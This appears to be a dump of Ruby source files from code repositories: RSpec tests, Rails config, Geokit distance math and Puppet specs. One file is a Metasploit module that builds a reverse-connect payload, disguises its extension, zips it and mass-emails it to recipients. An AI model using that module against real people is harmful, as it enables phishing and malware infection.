| 24.354839 | 212 | 0.568543 |
182791666de9df9b750c5d59e74a0a3928c3ebc7 | 1,601 | shared_examples_for 'a jdk build sexp' do
let(:export_jdk_version) { [:export, ['TRAVIS_JDK_VERSION', 'openjdk7']] }
let(:sexp) { [:if, '"$(command -v jdk_switcher &>/dev/null; echo $?)" == 0'] }
let(:run_jdk_switcher) { [:cmd, 'jdk_switcher use openjdk7', assert: true, echo: true] }
let(:set_dumb_term) { [:export, ['TERM', 'dumb'], echo: true] }
before do
Travis::Build.config.app_host = 'build.travis-ci.org'
end
describe 'if no jdk is given' do
before :each do
data[:config][:jdk] = nil
end
# TODO not true, the code clearly says the opposite
# it 'does not set TERM' do
# should_not include_sexp set_dumb_term
# end
it 'does not set TRAVIS_JDK_VERSION' do
should_not include_sexp export_jdk_version
end
it 'does not run jdk_switcher' do
should_not include_sexp run_jdk_switcher
end
end
context "when jdk is an array" do
before :each do
data[:config][:jdk] = ['openjdk7']
end
it 'sets TRAVIS_JDK_VERSION' do
should include_sexp export_jdk_version
end
end
describe 'if build.gradle exists' do
let(:sexp) { sexp_find(subject, [:if, '-f build.gradle || -f build.gradle.kts'], [:then]) }
it "sets TERM to 'dumb'" do
expect(sexp).to include_sexp set_dumb_term
end
end
end
shared_examples_for 'announces java versions' do
it 'runs java -version' do
should include_sexp [:cmd, 'java -Xmx32m -version', echo: true]
end
it 'runs javac -version' do
should include_sexp [:cmd, 'javac -J-Xmx32m -version', echo: true]
end
end
| 27.603448 | 95 | 0.648969 |
ffe127ac38caa46beb45e387e6df3bf92d0dec21 | 1,341 | # frozen_string_literal: true
class GenerationTestCase
include ::RSpec::Matchers
def initialize(router)
@router = router
end
def run!(tests)
_run! :path, tests
_run! :url, tests
end
private
def _run!(type, tests)
_for_each_test(type, tests) do |actual, expected|
expect(actual).to eq(expected)
end
end
def _for_each_test(type, tests)
tests.each do |test|
name, expected, args = *test
args = begin
args.dup
rescue
nil
end
_rescue name, expected, args do
actual = _actual(type, name, args)
expected = _expected(type, expected)
yield actual, expected
end
end
end
def _rescue(name, expected, args)
yield
rescue => exception
puts "Failed with #{name}, #{expected.inspect}, #{args.inspect}"
raise exception
end
def _actual(type, name, args)
case args
when Hash
@router.send(type, name, args)
when Array
var, a = *args
@router.send(type, name, *[var, a].flatten.compact)
when NilClass
@router.send(type, name)
else
raise args.inspect
end
end
def _expected(type, expected)
if type == :url
_absolute(expected)
else
expected
end
end
def _absolute(expected)
"http://localhost#{expected}"
end
end
| 18.369863 | 68 | 0.611484 |
01dbae1765b686f71cf75b06402214b4d3c1fd05 | 1,771 | Rails.application.configure do
# Settings specified here will take precedence over those in config/application.rb.
# The test environment is used exclusively to run your application's
# test suite. You never need to work with it otherwise. Remember that
# your test database is "scratch space" for the test suite and is wiped
# and recreated between test runs. Don't rely on the data there!
config.cache_classes = true
# Do not eager load code on boot. This avoids loading your whole application
# just for the purpose of running a single test. If you are using a tool that
# preloads Rails for running tests, you may have to set it to true.
config.eager_load = false
# Configure static asset server for tests with Cache-Control for performance.
config.serve_static_files = true
config.static_cache_control = 'public, max-age=3600'
# Show full error reports and disable caching.
config.consider_all_requests_local = true
config.action_controller.perform_caching = false
# Raise exceptions instead of rendering exception templates.
config.action_dispatch.show_exceptions = false
# Disable request forgery protection in test environment.
config.action_controller.allow_forgery_protection = false
# Tell Action Mailer not to deliver emails to the real world.
# The :test delivery method accumulates sent emails in the
# ActionMailer::Base.deliveries array.
config.action_mailer.delivery_method = :test
# Print deprecation notices to the stderr.
config.active_support.deprecation = :stderr
# Raises error for missing translations
# config.action_view.raise_on_missing_translations = true
config.active_record.raise_in_transactional_callbacks = true
config.active_support.test_order = :random
end
| 41.186047 | 85 | 0.779221 |
f83c02c2f8fb7ceacef3c3222e2e030c2e53f35a | 1,925 | require 'spec_helper'
describe Puppet::Type.type(:iis_site).provider(:webadministration) do
let(:resource) do
result = Puppet::Type.type(:iis_site).new(name: 'iis_site')
result.provider = subject
result
end
context 'verify provider' do
it { is_expected.to be_an_instance_of Puppet::Type::Iis_site::ProviderWebadministration }
it { is_expected.to respond_to(:create) }
it { is_expected.to respond_to(:exists?) }
it { is_expected.to respond_to(:destroy) }
it { is_expected.to respond_to(:start) }
it { is_expected.to respond_to(:stop) }
context 'verify ssl? function' do
it { is_expected.to respond_to(:ssl?) }
it 'returns true protocol == https' do
resource[:bindings] = {
'protocol' => 'https',
'bindinginformation' => '*:443:',
'sslflags' => 0,
'certificatehash' => 'D69B5C3315FF0DA09AF640784622CF20DC51F03E',
'certificatestorename' => 'My',
}
expect(subject.ssl?).to be true
end
it 'returns true bindings is an array' do
resource[:bindings] = [{
'protocol' => 'https',
'bindinginformation' => '*:443:',
'sslflags' => 0,
'certificatehash' => 'D69B5C3315FF0DA09AF640784622CF20DC51F03E',
'certificatestorename' => 'My',
},
{
'protocol' => 'http',
'bindinginformation' => '*:8080:',
}]
expect(subject.ssl?).to be true
end
it 'returns false if no https bindings are specified' do
resource[:bindings] = {
'protocol' => 'http',
'bindinginformation' => '*:8080:',
}
expect(subject.ssl?).to be false
end
end
end
end
| 33.77193 | 93 | 0.528831 |
d5fb337a2456e62320b1c03c5653d9cc0ab3cb4e | 90 | module BookingSync
module Public
class Availability < Public::Base
end
end
end | 15 | 37 | 0.722222 |
62afd6cda7b639878ac8b6d001709841550bc407 | 66 | require 'mtgox/order'
module MtGox
class Buy < Order
end
end
| 9.428571 | 21 | 0.712121 |
5dd5ac885c9398dc134b198836d131f3bbcd2bdc | 149 | class AddOptionsToRedcapProjectAdmins < ActiveRecord::Migration[5.2]
def change
add_column :redcap_project_admins, :options, :string
end
end
| 24.833333 | 68 | 0.791946 |
28074c801b6ce38c833427efc3b838ccc20d342e | 219 | class CreateEmailLists < ActiveRecord::Migration[4.2]
def change
create_table :email_lists do |t|
t.references :email, index: true
t.references :list, index: true
t.timestamps
end
end
end
| 19.909091 | 53 | 0.675799 |
d53b1852e4a3734e5dfefd105b29acd6d5d5ac55 | 1,126 | require 'spec_helper'
include MacOS
describe MacOS::XCVersion do
context 'when given an Xcode object with a download url' do
it 'returns the appropriate --url syntax containing the url' do
xcode = MacOS::Xcode.new('10.0', '/Applications/Xcode.app', 'https://www.apple.com')
expect(XCVersion.download_url_option(xcode)).to eq "--url='https://www.apple.com'"
end
end
context 'when given an Xcode object without a download url' do
before do
allow(MacOS::XCVersion).to receive(:available_versions).and_return(['10 GM seed'])
allow(MacOS::XCVersion).to receive(:xcversion_path).and_return('/foo/bar/bin/xcversion')
end
it 'passes an empty string for the url parameter' do
xcode = MacOS::Xcode.new('10.0', '/Applications/Xcode.app', '')
expect(XCVersion.download_url_option(xcode)).to eq ''
end
it 'executes the correct xcversion command with quotes around the version' do
xcode = MacOS::Xcode.new('10.0', '/Applications/Xcode.app', '')
expect(XCVersion.install_xcode(xcode)).to eq "/foo/bar/bin/xcversion install '10 GM seed'"
end
end
end
| 38.827586 | 96 | 0.695382 |
18c0b1da8deb48cc333dae9aeddf561edcbe19ab | 9,620 | # require 'forwardable'
module Geokit
# Contains class and instance methods providing distance calculation services.
# This module is meant to be mixed into classes containing lat and lng
# attributes where distance calculation is desired.
#
# At present, two forms of distance calculations are provided:
#
# * Pythagorean theorem (flat Earth) - which assumes the world is flat and
# loses accuracy over long distances.
# * Haversine (sphere) - which is fairly accurate, but at a performance cost.
#
# Distance units supported are :miles, :kms, :meters, and :nms.
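#
# Example (illustrative coordinates, assuming the Geokit::LatLng class that
# mixes this module in):
#
#   chicago = Geokit::LatLng.new(41.85, -87.65)
#   denver  = Geokit::LatLng.new(39.74, -104.98)
#   chicago.distance_to(denver, units: :miles) # => roughly 900 miles
#   chicago.heading_to(denver)                 # => bearing in degrees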
module Mappable
# Mix below class methods into the includer.
def self.included(receiver) # :nodoc:
receiver.extend ClassMethods
end
module ClassMethods #:nodoc:
PI_DIV_RAD = Math::PI / 180
EARTH_RADIUS_IN_METERS = 6_376_772.71
METERS_PER_LATITUDE_DEGREE = 111_181.9
EARTH_RADIUS = {}
PER_LATITUDE_DEGREE = {}
# Returns the distance between two points.
# @param from [String, Array, LatLng] +required+ -
# +Geokit::LatLng+ compatible value
# @param to [String, Array, LatLng] +required+ -
# +Geokit::LatLng+ compatible value
# @option options [String, Symbol] :units
# valid values are :miles, :kms, :nms.
# Default to Geokit::default_units
# @option options [String, Symbol] :formula
# valid values are :flat or :sphere.
# Default to Geokit::default_formula
# @example
# Geokit::GeoLoc.distance_between("43.8374249,4.3600687", "44.1253665,4.0852818")
def distance_between(from, to, options = {})
units = get_units!(options)
from = Geokit::LatLng.normalize(from)
to = Geokit::LatLng.normalize(to)
return 0.0 if from == to # fixes a "zero-distance" bug
formula = options[:formula] || Geokit.default_formula
case formula
when :sphere then distance_between_sphere(from, to, units)
when :flat then distance_between_flat(from, to, units)
end
end
def distance_between_sphere(from, to, units)
lat_sin = Math.sin(deg2rad(from.lat)) * Math.sin(deg2rad(to.lat))
lat_cos = Math.cos(deg2rad(from.lat)) * Math.cos(deg2rad(to.lat))
lng_cos = Math.cos(deg2rad(to.lng) - deg2rad(from.lng))
units_sphere_multiplier(units) * Math.acos(lat_sin + lat_cos * lng_cos)
rescue *math_error_classes
0.0
end
def distance_between_flat(from, to, units)
lat_length = units_per_latitude_degree(units) * (from.lat - to.lat)
lng_length = units_per_longitude_degree(from.lat, units) *
(from.lng - to.lng)
Math.sqrt(lat_length**2 + lng_length**2)
end
# Ruby 1.9 raises {Math::DomainError}, but it is not defined in Ruby 1.8
def math_error_classes
return [Errno::EDOM, Math::DomainError] if defined?(Math::DomainError)
[Errno::EDOM]
end
# Returns heading in degrees (0 is north, 90 is east, 180 is south, etc)
# from the first point to the second point. Typically, the instance methods
# will be used instead of this method.
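# Example (illustrative): heading_between("0,0", "0,1") # => 90.0 (due east)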
def heading_between(from, to)
from = Geokit::LatLng.normalize(from)
to = Geokit::LatLng.normalize(to)
d_lng = deg2rad(to.lng - from.lng)
from_lat = deg2rad(from.lat)
to_lat = deg2rad(to.lat)
y = Math.sin(d_lng) * Math.cos(to_lat)
x = Math.cos(from_lat) * Math.sin(to_lat) -
Math.sin(from_lat) * Math.cos(to_lat) * Math.cos(d_lng)
to_heading(Math.atan2(y, x))
end
# Given a start point, heading (in degrees), and distance, provides
# an endpoint. Returns a LatLng instance. Typically, the instance method
# will be used instead of this method.
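# Example (hypothetical values, default units):
#   endpoint("41.85,-87.65", 90, 10) # => a LatLng roughly 10 units due east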
def endpoint(start, heading, distance, options = {})
units = get_units!(options)
ratio = distance.to_f / units_sphere_multiplier(units)
start = Geokit::LatLng.normalize(start)
lat = deg2rad(start.lat)
lng = deg2rad(start.lng)
heading = deg2rad(heading)
sin_ratio = Math.sin(ratio)
cos_ratio = Math.cos(ratio)
sin_lat = Math.sin(lat)
cos_lat = Math.cos(lat)
end_lat = Math.asin(sin_lat * cos_ratio +
cos_lat * sin_ratio * Math.cos(heading))
end_lng = lng + Math.atan2(Math.sin(heading) * sin_ratio * cos_lat,
cos_ratio - sin_lat * Math.sin(end_lat))
LatLng.new(rad2deg(end_lat), rad2deg(end_lng))
end
# Returns the midpoint, given two points. Returns a LatLng.
# Typically, the instance method will be used instead of this method.
# Valid option:
# :units - valid values are :miles, :kms, :meters, or :nms
# (default: Geokit.default_units)
def midpoint_between(from, to, options = {})
from = Geokit::LatLng.normalize(from)
heading = from.heading_to(to)
distance = from.distance_to(to, options)
from.endpoint(heading, distance / 2, options)
end
# Geocodes a location using the multi geocoder.
def geocode(location, options = {})
res = Geocoders::MultiGeocoder.geocode(location, options)
return res if res.success?
raise Geokit::Geocoders::GeocodeError
end
# Given a decimal degree like -87.660333
# return a 3-element array like [ -87, 39, 37.198... ]
def decimal_to_dms(deg)
return false unless deg.is_a?(Numeric)
# seconds is 0...3599.999, representing the entire fractional part.
seconds = (deg.abs % 1.0) * 3600.0
[
deg.to_i, # degrees as positive or negative integer
(seconds / 60).to_i, # minutes as positive integer
(seconds % 60) # seconds as positive float
]
end
def deg2rad(degrees)
degrees.to_f / 180.0 * Math::PI
end
def rad2deg(rad)
rad.to_f * 180.0 / Math::PI
end
def to_heading(rad)
(rad2deg(rad) + 360) % 360
end
def self.register_unit(key, in_meters)
EARTH_RADIUS[key] = EARTH_RADIUS_IN_METERS * in_meters
PER_LATITUDE_DEGREE[key] = METERS_PER_LATITUDE_DEGREE * in_meters
end
register_unit :meters, 1
register_unit :kms, 1 / 1000.0
register_unit :miles, 1 / 1609.0
register_unit :nms, 0.0005400722448725917
# Returns the multiplier used to obtain the correct distance units.
# TODO: make more accurate by copying
# http://msi.nga.mil/MSISiteContent/StaticFiles/Calculators/degree.html
def units_sphere_multiplier(units)
EARTH_RADIUS[units]
end
# Returns the number of units per latitude degree.
def units_per_latitude_degree(units)
PER_LATITUDE_DEGREE[units]
end
# Returns the number of units per longitude degree.
def units_per_longitude_degree(lat, units)
units_sphere_multiplier(units) * Math.cos(lat * PI_DIV_RAD) * PI_DIV_RAD
end
# Extracts units from options. Returns Geokit.default_units when not present.
# Raises an exception when given an unsupported unit of length.
def get_units!(options = {})
units = options[:units]
units = Geokit.default_units if units.nil?
[:miles, :kms, :meters, :nms].include?(units) or
raise ArgumentError, "#{units} is an unsupported unit of length."
units
end
end
# -----------------------------------------------------------------------------------------------
# Instance methods below here
# -----------------------------------------------------------------------------------------------
# Extracts a LatLng instance. Use with models that are acts_as_mappable
def to_lat_lng
if instance_of?(Geokit::LatLng) || instance_of?(Geokit::GeoLoc)
return self
end
lat = send(self.class.lat_column_name)
lng = send(self.class.lng_column_name)
LatLng.new(lat, lng)
end
# Returns the distance from another point. The other point parameter is
# required to have lat and lng attributes. Valid options are:
# :units - valid values are :miles, :kms, :meters, or :nms (default: Geokit.default_units)
# :formula - valid values are :flat or :sphere (default: Geokit.default_formula)
def distance_to(other, options = {})
self.class.distance_between(self, other, options)
end
alias_method :distance_from, :distance_to
# Returns heading in degrees (0 is north, 90 is east, 180 is south, etc) to
# the given point. The given point can be a LatLng or a string to be
# Geocoded
def heading_to(other)
self.class.heading_between(self, other)
end
# Returns heading in degrees (0 is north, 90 is east, 180 is south, etc)
# FROM the given point. The given point can be a LatLng or a string to be
# Geocoded
def heading_from(other)
self.class.heading_between(other, self)
end
# Returns the endpoint, given a heading (in degrees) and distance.
# Valid option:
# :units - valid values are :miles, :kms, :meters, or :nms (default: Geokit.default_units)
def endpoint(heading, distance, options = {})
self.class.endpoint(self, heading, distance, options)
end
# Returns the midpoint, given another point on the map.
# Valid option:
# :units - valid values are :miles, :kms, :meters, or :nms (default: Geokit.default_units)
def midpoint_to(other, options = {})
self.class.midpoint_between(self, other, options)
end
end
end
| 38.023715 | 101 | 0.625052 |
336801806c110f318fa0bfdb6f7246e2596b3240 | 2,006 | require 'rails_helper'
RSpec.feature "AccessExistingDemos", type: :feature do
before do
t = Template.create!(name: "Windows 7 Enterprise SP1 64-bit - Sysprepped", skytap_id: 248757, region_name: 'US-East')
@demo = Demo.create!(template: t, email: '[email protected]')
end
scenario "User confirms after confirmation expired" do
@demo.update!(confirmation_expiration: 1.day.ago)
visit(@demo.url)
expect(page).to have_content("Your demo has expired")
end
scenario "User access after usage expired" do
@demo.update!(usage_expiration: 1.day.ago)
visit(@demo.url)
expect(page).to have_content("Your demo has expired")
end
scenario "User accesses existing demo that isn't provisioned yet" do
@demo.provisioning!
visit(@demo.url)
expect(page).to have_content("Please wait while your demo is provisioned")
end
scenario "User accesses existing demo successfully" do
@demo.update!(status: :provisioned, skytap_id: 123456, published_url: 'http://bogus/url')
visit(@demo.url)
expect(page).to have_content("Your demo is available")
expect(page).to have_link("Access Demo", href: 'http://bogus/url')
end
scenario "User accesses existing demo in an error state" do
@demo.update!(status: :error, skytap_id: 123456, provisioning_error: 'something bad happened')
visit(@demo.url)
expect(page).to have_content("An error has occurred")
expect(page).to have_content("something bad happened")
end
scenario "Demo status is updated in real time", js: true do
@demo.provisioning!
visit(@demo.url)
expect(page).to have_content("Please wait while your demo is provisioned")
@demo.update!(status: :provisioned, skytap_id: 123456, published_url: 'http://bogus/url')
sleep 10
expect(page).not_to have_content("Please wait while your demo is provisioned")
expect(page).to have_content("Your demo is available")
expect(page).to have_link("Access Demo", href: 'http://bogus/url')
end
end
| 32.885246 | 125 | 0.710369 |
6a1d9ad02032f22a363eca802c39a9e7c5391160 | 1,255 | module VCAP::CloudController
class AppCreate
class InvalidApp < StandardError; end
def initialize(user_audit_info)
@user_audit_info = user_audit_info
@logger = Steno.logger('cc.action.app_create')
end
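# `lifecycle` is expected to respond to #create_lifecycle_data_model(app)
# (e.g. a buildpack or docker lifecycle object), as inferred from its use below.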
def create(message, lifecycle)
app = nil
AppModel.db.transaction do
app = AppModel.create(
name: message.name,
space_guid: message.space_guid,
environment_variables: message.environment_variables,
)
lifecycle.create_lifecycle_data_model(app)
raise CloudController::Errors::ApiError.new_from_details('CustomBuildpacksDisabled') if using_disabled_custom_buildpack?(app)
Repositories::AppEventRepository.new.record_app_create(
app,
app.space,
@user_audit_info,
message.audit_hash
)
end
app
rescue Sequel::ValidationFailed => e
raise InvalidApp.new(e.message)
end
private
def using_disabled_custom_buildpack?(app)
app.lifecycle_data.using_custom_buildpack? && custom_buildpacks_disabled?
end
def custom_buildpacks_disabled?
VCAP::CloudController::Config.config[:disable_custom_buildpacks]
end
end
end
| 26.702128 | 133 | 0.669323 |
218c754c63040fd3443be02433030feac26f3da7 | 7,045 | ##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'yaml'
require 'tmpdir' # for Dir.tmpdir used in #run below
class Metasploit3 < Msf::Auxiliary
#
# This module sends email messages via smtp
#
include Msf::Exploit::Remote::SMTPDeliver
include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
'Name' => 'Generic Emailer (SMTP)',
'Description' => %q{
This module can be used to automate email delivery.
This code is based on Joshua Abraham's email script for social
engineering.
},
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'http://spl0it.org/' ],
],
'Author' => [ 'et <et[at]metasploit.com>' ]))
register_options(
[
OptString.new('RHOST', [true, "SMTP server address",'127.0.0.1']),
OptString.new('RPORT', [true, "SMTP server port",'25']),
OptString.new('YAML_CONFIG', [true, "Full path to YAML Configuration file",
File.join(Msf::Config.install_root, "data","emailer_config.yaml")]),
], self.class)
# Hide this option from the user
deregister_options('MAILTO')
deregister_options('SUBJECT')
end
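# Reads delivery options from the YAML file at YAML_CONFIG. Illustrative
# (hypothetical) layout, with keys matching those read below:
#
#   to: /tmp/recipients.csv   # file of "First Last,user@example.com" lines
#   from: sender@example.com
#   subject: Quarterly report
#   type: text/plain
#   msg_file: /tmp/body.txt
#   wait: 5
#   make_payload: false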
def load_yaml_conf
opts = {}
File.open(datastore['YAML_CONFIG'], "rb") do |f|
yamlconf = YAML::load(f)
opts['to'] = yamlconf['to']
opts['from'] = yamlconf['from']
opts['subject'] = yamlconf['subject']
opts['type'] = yamlconf['type']
opts['msg_file'] = yamlconf['msg_file']
opts['wait'] = yamlconf['wait']
opts['add_name'] = yamlconf['add_name']
opts['sig'] = yamlconf['sig']
opts['sig_file'] = yamlconf['sig_file']
opts['attachment'] = yamlconf['attachment']
opts['attachment_file'] = yamlconf['attachment_file']
opts['attachment_file_type'] = yamlconf['attachment_file_type']
opts['attachment_file_name'] = yamlconf['attachment_file_name']
### payload options ###
opts['make_payload'] = yamlconf['make_payload']
opts['zip_payload'] = yamlconf['zip_payload']
opts['msf_port'] = yamlconf['msf_port']
opts['msf_ip'] = yamlconf['msf_ip']
opts['msf_payload'] = yamlconf['msf_payload']
opts['msf_filename'] = yamlconf['msf_filename']
opts['msf_change_ext'] = yamlconf['msf_change_ext']
opts['msf_payload_ext'] = yamlconf['msf_payload_ext']
end
opts
end
def load_file(fname)
buf = ''
File.open(fname, 'rb') do |f|
buf = f.read
end
buf
end
def run
yamlconf = load_yaml_conf
fileto = yamlconf['to']
from = yamlconf['from']
subject = yamlconf['subject']
type = yamlconf['type']
msg_file = yamlconf['msg_file']
wait = yamlconf['wait']
add_name = yamlconf['add_name']
sig = yamlconf['sig']
sig_file = yamlconf['sig_file']
attachment = yamlconf['attachment']
attachment_file = yamlconf['attachment_file']
attachment_file_type = yamlconf['attachment_file_type']
attachment_file_name = yamlconf['attachment_file_name']
make_payload = yamlconf['make_payload']
zip_payload = yamlconf['zip_payload']
msf_port = yamlconf['msf_port']
msf_ip = yamlconf['msf_ip']
msf_payload = yamlconf['msf_payload']
msf_filename = yamlconf['msf_filename']
msf_change_ext = yamlconf['msf_change_ext']
msf_payload_ext = yamlconf['msf_payload_ext']
tmp = Dir.tmpdir
datastore['MAILFROM'] = from
msg = load_file(msg_file)
email_sig = sig ? load_file(sig_file) : nil
if type !~ /text/i
print_error("Unexpected message type in YAML config: #{type}")
end
if make_payload
attachment_file = File.join(tmp, msf_filename)
attachment_file_name = msf_filename
print_status("Creating payload...")
mod = framework.payloads.create(msf_payload)
if (not mod)
print_error("Failed to create payload, #{msf_payload}")
return
end
# By not passing an explicit encoder, we're asking the
# framework to pick one for us. In general this is the best
# way to encode.
buf = mod.generate_simple(
'Format' => 'raw',
'Options' => { "LHOST"=>msf_ip, "LPORT"=>msf_port }
)
exe = generate_payload_exe({
:code => buf,
:arch => mod.arch,
:platform => mod.platform
})
print_status("Writing payload to #{attachment_file}")
# XXX If Rex::Zip will let us zip a buffer instead of a file,
# there's no reason to write this out
File.open(attachment_file, "wb") do |f|
f.write(exe)
end
if msf_change_ext
msf_payload_newext = attachment_file
msf_payload_newext = msf_payload_newext.sub(/\.\w+$/, ".#{msf_payload_ext}")
File.rename(attachment_file, msf_payload_newext)
attachment_file = msf_payload_newext
end
if zip_payload
zip_file = attachment_file.sub(/\.\w+$/, '.zip')
system("zip -r #{zip_file} #{attachment_file} > /dev/null 2>&1")
attachment_file = zip_file
attachment_file_type = 'application/zip'
else
attachment_file_type = 'application/exe'
end
end
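# Each recipient line is expected to look like "First Last,user@example.com"
# (display name and address comma-separated); the format is inferred from the
# parsing below, and the sample address is illustrative.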
File.foreach(fileto) do |l|
next if l !~ /\@/
nem = l.split(',')
name = nem[0].split(' ')
fname = name[0]
lname = name[1]
email = nem[1]
if add_name
email_msg_body = "#{fname},\n\n#{msg}"
else
email_msg_body = msg
end
if sig
email_msg_body = "#{email_msg_body}\n#{email_sig}"
end
print_status("Emailing #{name[0]} #{name[1]} at #{email}")
mime_msg = Rex::MIME::Message.new
mime_msg.mime_defaults
mime_msg.from = from
mime_msg.to = email
datastore['MAILTO'] = email.strip
mime_msg.subject = subject
mime_msg.add_part(Rex::Text.encode_base64(email_msg_body, "\r\n"), type, "base64", "inline")
if attachment
if attachment_file_name
data_attachment = load_file(attachment_file)
mime_msg.add_part(Rex::Text.encode_base64(data_attachment, "\r\n"), attachment_file_type, "base64", "attachment; filename=\"#{attachment_file_name}\"")
end
end
send_message(mime_msg.to_s)
select(nil,nil,nil,wait)
end
print_status("Email sent..")
end
end
| 30.899123 | 161 | 0.576579 |
f7a43f7b1e773b4b2a5a0d66eba280f8096aa427 | 972 | require 'test_helper'
class SetupsControllerTest < ActionController::TestCase
setup do
@setup = setups(:one)
end
test "should get index" do
get :index
assert_response :success
assert_not_nil assigns(:setups)
end
test "should get new" do
get :new
assert_response :success
end
test "should create setup" do
assert_difference('Setup.count') do
post :create, setup: { }
end
assert_redirected_to setup_path(assigns(:setup))
end
test "should show setup" do
get :show, id: @setup
assert_response :success
end
test "should get edit" do
get :edit, id: @setup
assert_response :success
end
test "should update setup" do
patch :update, id: @setup, setup: { }
assert_redirected_to setup_path(assigns(:setup))
end
test "should destroy setup" do
assert_difference('Setup.count', -1) do
delete :destroy, id: @setup
end
assert_redirected_to setups_path
end
end
| 19.44 | 55 | 0.676955 |
e21b9dd7800219ad63feee66016f37da28bab94d | 566 | class AboutUsPage < Fae::StaticPage
@slug = 'about_us'
# Required to set the has_one associations; Fae::StaticPage will build these associations dynamically.
def self.fae_fields
{
header: { type: Fae::TextField, validates: { presence: true } },
introduction: { type: Fae::TextArea },
body: {
type: Fae::TextArea,
languages: [:en, :zh],
validates: {
length: {
maximum: 150
}
}
},
header_image: { type: Fae::Image, languages: Fae.languages.keys }
}
end
end | 24.608696 | 103 | 0.574205 |
184bd94b75906bacef1a79da5e99e63ac2b59df4 | 1,096 | require 'test/unit'
require 'mocha/setup'
require_relative '../../../../lib/fluent_command_builder'
class PathTest < Test::Unit::TestCase
include FluentCommandBuilder
def test_should_join_path_on_initialize
p = Path.new 'a', 'b'
assert_equal 'a/b', p.path
end
def test_should_normalise_path_on_unix
ENV['WINDIR'] = nil
p = Path.new '\\path'
assert_equal '/path', p.normalised_path
end
def test_should_normalise_path_on_windows
ENV['WINDIR'] = 'C:\\Windows'
p = Path.new 'C:/path'
assert_equal 'C:\\path', p.normalised_path
end
unless ENV['WINDIR']
def test_should_evaluate_path_on_unix
p = Path.new '$command_path'
ENV['command_path'] = '/path'
assert_equal '/path', p.evaluated_path
end
end
if ENV['WINDIR']
def test_should_evaluate_path_on_windows
p = Path.new '%command_path%'
ENV['command_path'] = 'C:\\path'
assert_equal 'C:\\path', p.evaluated_path
end
end
def test_should_ignore_empty_path_entries
p = Path.new '', 'command'
assert_equal 'command', p.path
end
end | 23.826087 | 57 | 0.676095 |
2151e783abacd9421ca8094bd4e8afce4d3e326c | 342 | name "#{@hostinfo[:role]}: swap usage > 50%"
message "A #{@hostinfo[:role]} machine is swapping heavily"
applies { @hostinfo[:role] }
notify.groups @hostinfo[:owner_groups]
notify.people @hostinfo[:owners]
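# The query below averages system.swap.pct_free per host over the trailing
# 10 minutes and triggers when less than half of swap is free.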
metric.datadog_query <<EOQ
avg(last_10m):avg:system.swap.pct_free{chef_role:#{@hostinfo[:role]}} by {host} < 0.5
EOQ
silenced false
| 24.428571 | 85 | 0.722222 |